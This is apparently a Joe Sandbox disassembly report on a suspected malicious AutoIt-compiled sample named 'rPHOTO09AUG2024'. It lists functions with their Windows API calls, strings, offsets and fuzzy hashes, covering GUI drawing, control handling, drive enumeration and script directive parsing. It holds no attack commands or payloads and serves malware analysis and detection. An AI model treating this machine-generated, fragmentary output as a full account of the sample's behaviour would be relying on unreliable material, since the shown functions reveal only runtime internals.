ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DB808F

Strings

static, xrefs: 00DB7D8A, 00DB7EE1
AutoIt v3, xrefs: 00DB7D42
, xrefs: 00DB8015
DISPLAY, xrefs: 00DB7EF2

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 42f20b54289dd575ae510d02343b49b92601c5dd4bf84c8a537a3dd3de21c4b4
Instruction ID: 31d36caafd38070095ad3e62e43f7c839e1b43c379730226e32682db9608ef04
Opcode Fuzzy Hash: 42f20b54289dd575ae510d02343b49b92601c5dd4bf84c8a537a3dd3de21c4b4
Instruction Fuzzy Hash: C2023A71900216EFDB14DF69CC89EAEBBB9EB48310F148558F916EB2A1CB719D41CB70

Function 00DC37F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,00DCF910), ref: 00DC38AF
IsWindowVisible.USER32(?), ref: 00DC38D3

Strings

CURRENTTAB, xrefs: 00DC3945
EDITPASTE, xrefs: 00DC3BE7
GETLINE, xrefs: 00DC3C23
HIDEDROPDOWN, xrefs: 00DC3988
UNCHECK, xrefs: 00DC3B0B
ISENABLED, xrefs: 00DC38F3
CHECK, xrefs: 00DC3AF5
ADDSTRING, xrefs: 00DC399E
SELECTSTRING, xrefs: 00DC3A8E
GETSELECTED, xrefs: 00DC3B2B
FINDSTRING, xrefs: 00DC39FE
GETCURRENTCOL, xrefs: 00DC3BB0
DELSTRING, xrefs: 00DC39D1
TABLEFT, xrefs: 00DC390F
ISCHECKED, xrefs: 00DC3AC1
TABRIGHT, xrefs: 00DC3925
ISVISIBLE, xrefs: 00DC38BF
SETCURRENTSELECTION, xrefs: 00DC3A3E
GETCURRENTLINE, xrefs: 00DC3B75
GETLINECOUNT, xrefs: 00DC3B4E
SHOWDROPDOWN, xrefs: 00DC3968
GETCURRENTSELECTION, xrefs: 00DC3A6B
SENDCOMMANDID, xrefs: 00DC3C62

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: d0f344f6f9115d90c3ef796a18ee9d1fbddc6a036062950c7bc5858de0f8817f
Instruction ID: 6ca11caad3c483562be982d53fe39ddc67db8da094150f040dfb07ac9e12dfd8
Opcode Fuzzy Hash: d0f344f6f9115d90c3ef796a18ee9d1fbddc6a036062950c7bc5858de0f8817f
Instruction Fuzzy Hash: 24D16F302043069BCB14EF24C551F6EBBA6EF94354F15855DB9865B3A2CB31EE0ACBB1

Function 00DCA849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00DCA89F
GetSysColorBrush.USER32(0000000F), ref: 00DCA8D0
GetSysColor.USER32(0000000F), ref: 00DCA8DC
SetBkColor.GDI32(?,000000FF), ref: 00DCA8F6
SelectObject.GDI32(?,?), ref: 00DCA905
InflateRect.USER32(?,000000FF,000000FF), ref: 00DCA930
GetSysColor.USER32(00000010), ref: 00DCA938
CreateSolidBrush.GDI32(00000000), ref: 00DCA93F
FrameRect.USER32(?,?,00000000), ref: 00DCA94E
DeleteObject.GDI32(00000000), ref: 00DCA955
InflateRect.USER32(?,000000FE,000000FE), ref: 00DCA9A0
FillRect.USER32(?,?,?), ref: 00DCA9D2
GetWindowLongW.USER32(?,000000F0), ref: 00DCA9FD

Part of subcall function 00DCAB60: GetSysColor.USER32(00000012), ref: 00DCAB99
Part of subcall function 00DCAB60: SetTextColor.GDI32(?,?), ref: 00DCAB9D
Part of subcall function 00DCAB60: GetSysColorBrush.USER32(0000000F), ref: 00DCABB3
Part of subcall function 00DCAB60: GetSysColor.USER32(0000000F), ref: 00DCABBE
Part of subcall function 00DCAB60: GetSysColor.USER32(00000011), ref: 00DCABDB
Part of subcall function 00DCAB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00DCABE9
Part of subcall function 00DCAB60: SelectObject.GDI32(?,00000000), ref: 00DCABFA
Part of subcall function 00DCAB60: SetBkColor.GDI32(?,00000000), ref: 00DCAC03
Part of subcall function 00DCAB60: SelectObject.GDI32(?,?), ref: 00DCAC10
Part of subcall function 00DCAB60: InflateRect.USER32(?,000000FF,000000FF), ref: 00DCAC2F
Part of subcall function 00DCAB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00DCAC46
Part of subcall function 00DCAB60: GetWindowLongW.USER32(00000000,000000F0), ref: 00DCAC5B

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: f8651733776843beab3064fb8a52de1aa38d2ba39ea37cd74af127ce9f1bc41e
Instruction ID: b7ccd945eb9077216e73f68cf111d9e11a6d538a03ee1d52d84050bb3359063c
Opcode Fuzzy Hash: f8651733776843beab3064fb8a52de1aa38d2ba39ea37cd74af127ce9f1bc41e
Instruction Fuzzy Hash: 25A16071008307AFD7119F64DC08F9B7BAAFF88325F144A29F552D62A0D731D944CB62

Function 00DB77BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00DB77F1
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00DB78B0
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00DB78EE
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00DB7900
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00DB7946
GetClientRect.USER32(00000000,?), ref: 00DB7952
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00DB7996
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00DB79A5
GetStockObject.GDI32(00000011), ref: 00DB79B5
SelectObject.GDI32(00000000,00000000), ref: 00DB79B9
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00DB79C9
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DB79D2
DeleteDC.GDI32(00000000), ref: 00DB79DB
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00DB7A07
SendMessageW.USER32(00000030,00000000,00000001), ref: 00DB7A1E
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00DB7A59
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00DB7A6D
SendMessageW.USER32(00000404,00000001,00000000), ref: 00DB7A7E
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00DB7AAE
GetStockObject.GDI32(00000011), ref: 00DB7AB9
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00DB7AC4
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00DB7ACE

Strings

static, xrefs: 00DB7990, 00DB7AA8
AutoIt v3, xrefs: 00DB793E
DISPLAY, xrefs: 00DB799B
msctls_progress32, xrefs: 00DB7A4F

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 08cdc4e015ced1c381ca309143e1342a9459485d29b40ae90637fc8391153ffb
Instruction ID: b9cb784fd94e441c71ce0f0634a4b68ff31a399f8039f8fc0048a3ce3896c649
Opcode Fuzzy Hash: 08cdc4e015ced1c381ca309143e1342a9459485d29b40ae90637fc8391153ffb
Instruction Fuzzy Hash: 48A16FB1A40216BFEB149BA5DC4AFEE7BAAEB44710F048514FA15E72E0C770AD54CB70

Function 00DAAF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00DAAF89
GetDriveTypeW.KERNEL32(?,00DCFAC0,?,\\.\,00DCF910), ref: 00DAB066
SetErrorMode.KERNEL32(00000000,00DCFAC0,?,\\.\,00DCF910), ref: 00DAB1C4

Strings

USB, xrefs: 00DAB15B
SAS, xrefs: 00DAB170
RAID, xrefs: 00DAB162
Fibre, xrefs: 00DAB154
SCSI, xrefs: 00DAB131
Removable, xrefs: 00DAB0B8
Fixed, xrefs: 00DAB0AE
ATA, xrefs: 00DAB13F
Network, xrefs: 00DAB0A4
PhysicalDrive, xrefs: 00DAB012
RAMDisk, xrefs: 00DAB090
FileBackedVirtual, xrefs: 00DAB193
1394, xrefs: 00DAB146
iSCSI, xrefs: 00DAB169
ATAPI, xrefs: 00DAB138
SSD, xrefs: 00DAB0F1
Virtual, xrefs: 00DAB18C
SSA, xrefs: 00DAB14D
Unknown, xrefs: 00DAB086, 00DAB12A
CDROM, xrefs: 00DAB09A
MMC, xrefs: 00DAB185
\\.\, xrefs: 00DAAFDB
SATA, xrefs: 00DAB177

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: a473bfedf5ffe42a2070ea0fe212ddf88cf6cee24efd0e7458884d36f78f2290
Instruction ID: eaf72d77edbb5fbf4760847563756c7878433ac200b9dcc6cc3f12625cc85229
Opcode Fuzzy Hash: a473bfedf5ffe42a2070ea0fe212ddf88cf6cee24efd0e7458884d36f78f2290
Instruction Fuzzy Hash: 3451F370680309AF8B00EF14C9A2CBDB7B1EB163617258017F54AA7292C735ED47DB72

Function 00D46A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00D46A91
__wcsnicmp.LIBCMT ref: 00D46AA9
__wcsnicmp.LIBCMT ref: 00D46AC1
__wcsnicmp.LIBCMT ref: 00D46AD9
__wcsnicmp.LIBCMT ref: 00D46AF1
__wcsnicmp.LIBCMT ref: 00D46B09
__wcsnicmp.LIBCMT ref: 00D46B21
__wcsnicmp.LIBCMT ref: 00D46B35
__wcsnicmp.LIBCMT ref: 00D46B76
__wcsnicmp.LIBCMT ref: 00D46B8A
__wcsnicmp.LIBCMT ref: 00D46B9E
__wcsnicmp.LIBCMT ref: 00D46BB2

Strings

#comments-start, xrefs: 00D46B1B, 00D46B70
#comments-end, xrefs: 00D46B98
#include, xrefs: 00D46B03
#notrayicon, xrefs: 00D46AA3
#pragma compile, xrefs: 00D46A8B
#ce, xrefs: 00D46BAC
Unterminated group of comments, xrefs: 00D7E82C
#include-once, xrefs: 00D46AEB
#OnAutoItStartRegister, xrefs: 00D46AD3
#requireadmin, xrefs: 00D46ABB
Cannot parse #include, xrefs: 00D7E819
Bad directive syntax error, xrefs: 00D7E743
#cs, xrefs: 00D46B2F, 00D46B84

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: d9e5dc8ec958ec2a8af9c700eccaac825caf4ad7d2de5195b9d37f0596a7cce0
Instruction ID: b3fabcfd8d5b38d574c0ed3430ebb8144bd41ab93c1d2f86dd355e7e99b03009
Opcode Fuzzy Hash: d9e5dc8ec958ec2a8af9c700eccaac825caf4ad7d2de5195b9d37f0596a7cce0
Instruction Fuzzy Hash: E4810C70640355BBCB24AB60CC83FBF7759EF15700F088165F986AA182EB60DA45D2B2

Function 00DCAB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00DCAB99
SetTextColor.GDI32(?,?), ref: 00DCAB9D
GetSysColorBrush.USER32(0000000F), ref: 00DCABB3
GetSysColor.USER32(0000000F), ref: 00DCABBE
CreateSolidBrush.GDI32(?), ref: 00DCABC3
GetSysColor.USER32(00000011), ref: 00DCABDB
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00DCABE9
SelectObject.GDI32(?,00000000), ref: 00DCABFA
SetBkColor.GDI32(?,00000000), ref: 00DCAC03
SelectObject.GDI32(?,?), ref: 00DCAC10
InflateRect.USER32(?,000000FF,000000FF), ref: 00DCAC2F
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00DCAC46
GetWindowLongW.USER32(00000000,000000F0), ref: 00DCAC5B
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00DCACA7
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00DCACCE
InflateRect.USER32(?,000000FD,000000FD), ref: 00DCACEC
DrawFocusRect.USER32(?,?), ref: 00DCACF7
GetSysColor.USER32(00000011), ref: 00DCAD05
SetTextColor.GDI32(?,00000000), ref: 00DCAD0D
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00DCAD21
SelectObject.GDI32(?,00DCA869), ref: 00DCAD38
DeleteObject.GDI32(?), ref: 00DCAD43
SelectObject.GDI32(?,?), ref: 00DCAD49
DeleteObject.GDI32(?), ref: 00DCAD4E
SetTextColor.GDI32(?,?), ref: 00DCAD54
SetBkColor.GDI32(?,?), ref: 00DCAD5E

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: a34a31574c016be4b973e7220a004425802a6535c9c17a661b999e04495b41a7
Instruction ID: dc286774c5dc68bbe74d1c0c785fd05d4d8296299f11e1d98b6ebca4895509c1
Opcode Fuzzy Hash: a34a31574c016be4b973e7220a004425802a6535c9c17a661b999e04495b41a7
Instruction Fuzzy Hash: 35615D7190021AEFDF119FA8DC48EEE7B7AEB08320F144225F915EB2A1D6719D40DBA0

Function 00DC8C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00DC8D34
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DC8D45
CharNextW.USER32(0000014E), ref: 00DC8D74
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00DC8DB5
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00DC8DCB
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DC8DDC
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00DC8DF9
SetWindowTextW.USER32(?,0000014E), ref: 00DC8E45
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00DC8E5B
SendMessageW.USER32(?,00001002,00000000,?), ref: 00DC8E8C
_memset.LIBCMT ref: 00DC8EB1
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00DC8EFA
_memset.LIBCMT ref: 00DC8F59
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00DC8F83
SendMessageW.USER32(?,00001074,?,00000001), ref: 00DC8FDB
SendMessageW.USER32(?,0000133D,?,?), ref: 00DC9088
InvalidateRect.USER32(?,00000000,00000001), ref: 00DC90AA
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00DC90F4
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00DC9121
DrawMenuBar.USER32(?), ref: 00DC9130
SetWindowTextW.USER32(?,0000014E), ref: 00DC9158

Strings

0, xrefs: 00DC90C2

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 0e09da7ddeb1cb88d37b1223f8f5796192cb1de7bc162d6d2e6814bdf25d1182
Instruction ID: de8347eb4994f360ed5e71bf3f8c57ba0fd678018e34e48c4467660656db7b48
Opcode Fuzzy Hash: 0e09da7ddeb1cb88d37b1223f8f5796192cb1de7bc162d6d2e6814bdf25d1182
Instruction Fuzzy Hash: 71E15E7090021AABDF109F54CC89FEE7BB9EF15710F18815AF955AB290DB708A85DF70

Function 00DC4B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00DC4C51
GetDesktopWindow.USER32 ref: 00DC4C66
GetWindowRect.USER32(00000000), ref: 00DC4C6D
GetWindowLongW.USER32(?,000000F0), ref: 00DC4CCF
DestroyWindow.USER32(?), ref: 00DC4CFB
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00DC4D24
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DC4D42
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00DC4D68
SendMessageW.USER32(?,00000421,?,?), ref: 00DC4D7D
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00DC4D90
IsWindowVisible.USER32(?), ref: 00DC4DB0
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00DC4DCB
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00DC4DDF
GetWindowRect.USER32(?,?), ref: 00DC4DF7
MonitorFromPoint.USER32(?,?,00000002), ref: 00DC4E1D
GetMonitorInfoW.USER32(00000000,?), ref: 00DC4E37
CopyRect.USER32(?,?), ref: 00DC4E4E
SendMessageW.USER32(?,00000412,00000000), ref: 00DC4EB9

Strings

(, xrefs: 00DC4E2A
0, xrefs: 00DC4BFC
tooltips_class32, xrefs: 00DC4D1D

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: a7f7b77e9492220136754be29d656a57eb02f81bd99bd6ab6880b020be327821
Instruction ID: cb784048cd4b47e8e79a105bd55c4464e72f971de38b0b50ae45edd0b6832b6e
Opcode Fuzzy Hash: a7f7b77e9492220136754be29d656a57eb02f81bd99bd6ab6880b020be327821
Instruction Fuzzy Hash: F8B15771604342AFDB04DF65C998F6ABBE5FF88310F04891CF5999B2A1DB71E805CBA1

Function 00DA46D6 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00DA46E8
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00DA470E
_wcscpy.LIBCMT ref: 00DA473C
_wcscmp.LIBCMT ref: 00DA4747
_wcscat.LIBCMT ref: 00DA475D
_wcsstr.LIBCMT ref: 00DA4768
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00DA4784
_wcscat.LIBCMT ref: 00DA47CD
_wcscat.LIBCMT ref: 00DA47D4
_wcsncpy.LIBCMT ref: 00DA47FF

Strings

StringFileInfo\, xrefs: 00DA4757
DefaultLangCodepage, xrefs: 00DA47E7
%u.%u.%u.%u, xrefs: 00DA4862
04090000, xrefs: 00DA47BA
\VarFileInfo\Translation, xrefs: 00DA477C

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 93346f672a8a7dfbfe291c76ce1a266cb767a3c2154ace9e9c4a74f6d76a0517
Instruction ID: b516398849393d9fbcd9ace4e77d6c029e21045a70e4502fe9ebcc7f39e34a9a
Opcode Fuzzy Hash: 93346f672a8a7dfbfe291c76ce1a266cb767a3c2154ace9e9c4a74f6d76a0517
Instruction Fuzzy Hash: 96410372A00205BBEB10AB759C43EBF77BCDF46710F04416AF905E7182EBB5EA0196B5

Function 00D427D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00D428BC
GetSystemMetrics.USER32(00000007), ref: 00D428C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00D428EF
GetSystemMetrics.USER32(00000008), ref: 00D428F7
GetSystemMetrics.USER32(00000004), ref: 00D4291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00D42939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00D42949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00D4297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00D42990
GetClientRect.USER32(00000000,000000FF), ref: 00D429AE
GetStockObject.GDI32(00000011), ref: 00D429CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 00D429D5

Part of subcall function 00D42344: GetCursorPos.USER32(?), ref: 00D42357
Part of subcall function 00D42344: ScreenToClient.USER32(00E067B0,?), ref: 00D42374
Part of subcall function 00D42344: GetAsyncKeyState.USER32(00000001), ref: 00D42399
Part of subcall function 00D42344: GetAsyncKeyState.USER32(00000002), ref: 00D423A7

SetTimer.USER32(00000000,00000000,00000028,00D41256), ref: 00D429FC

Strings

AutoIt v3 GUI, xrefs: 00D42974

